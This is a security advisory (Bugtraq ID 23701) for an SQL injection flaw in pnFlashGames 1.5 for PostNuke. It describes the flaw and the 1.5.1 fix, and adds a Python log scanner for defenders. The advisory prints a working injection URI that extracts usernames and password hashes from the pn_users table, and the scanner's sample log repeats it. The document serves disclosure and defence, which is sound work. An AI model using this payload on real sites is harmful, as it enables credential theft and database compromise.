PNFlashGames PostNuke Module Index.PHP SQL Injection Vulnerability
BID:23701
Info
| Bugtraq ID: | 23701 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 28 2007 12:00AM |
| Updated: | May 25 2007 05:11PM |
| Credit: | xoron is credited with the discovery of this vulnerability. |
| Vulnerable: | pnFlashGames pnFlashGames 1.5 |
| Not Vulnerable: | pnFlashGames pnFlashGames 1.5.1 |
Discussion
pnFlashGames PostNuke module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
pnFlashGames 1.5 is vulnerable; other versions may also be affected.
Exploit / POC
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/*
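For defenders reviewing web server logs, the following added example (not part of the original advisory or the vendor's code) flags pnFlashGames requests whose `cid` value is not a plain integer. It assumes Common/Combined Log Format and that `cid` is meant to be a numeric ID; the function names and log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request line of a Common/Combined Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]+")  # assumption: a legitimate cid is a numeric ID

# Constructed sample log lines; the second carries the advisory's example URI.
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Apr/2007:10:00:01 +0000] "GET /index.php?module=pnFlashGames&func=view&cid=3 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [28/Apr/2007:10:02:17 +0000] "GET /index.php?module=pnFlashGames&func=view&cid=-1/**/union/**/select/**/0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13/**/from/**/pn_users/**/where/**/pn_uid=2/* HTTP/1.1" 200 812',
    '192.0.2.10 - - [28/Apr/2007:10:03:40 +0000] "GET /index.php?module=News&cid=abc HTTP/1.1" 200 900',
    '192.0.2.77 - - [28/Apr/2007:10:05:02 +0000] "GET /index.php?module=pnFlashGames&func=view&cid=abc HTTP/1.1" 200 640',
]

def suspicious_cid(url):
    """Return the cid value if a pnFlashGames request carries a cid that is
    not a plain non-negative integer; return None otherwise."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if not any(m.lower() == "pnflashgames" for m in query.get("module", [])):
        return None  # other modules are out of scope for this check
    for value in query.get("cid", []):  # parse_qs has already URL-decoded it
        if not INTEGER_RE.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, cid_value) for every flagged log line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parseable request line
        bad = suspicious_cid(match.group(1))
        if bad is not None:
            hits.append((line.split(" ", 1)[0], bad))
    return hits

if __name__ == "__main__":
    for ip, cid in scan(SAMPLE_LOG):
        print(f"{ip}\tcid={cid!r}")
```

Checking for a strictly numeric value rather than matching SQL keywords means the check does not depend on how the injected text is spelled or spaced.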
Solution / Fix
Solution:
The vendor has released version 1.5.1 to address this issue; please see the reference section for details.
pnFlashGames pnFlashGames 1.5
- pnFlashGames pnFlashGames Module 1.5.1: http://www.pnflashgames.com/UpDownload-index-req-getit-lid-292.phtml
References
References:
- pnFlashGames update to version 1.5.1 (pnFlashGames)
- Vendor Homepage (pnFlashGames)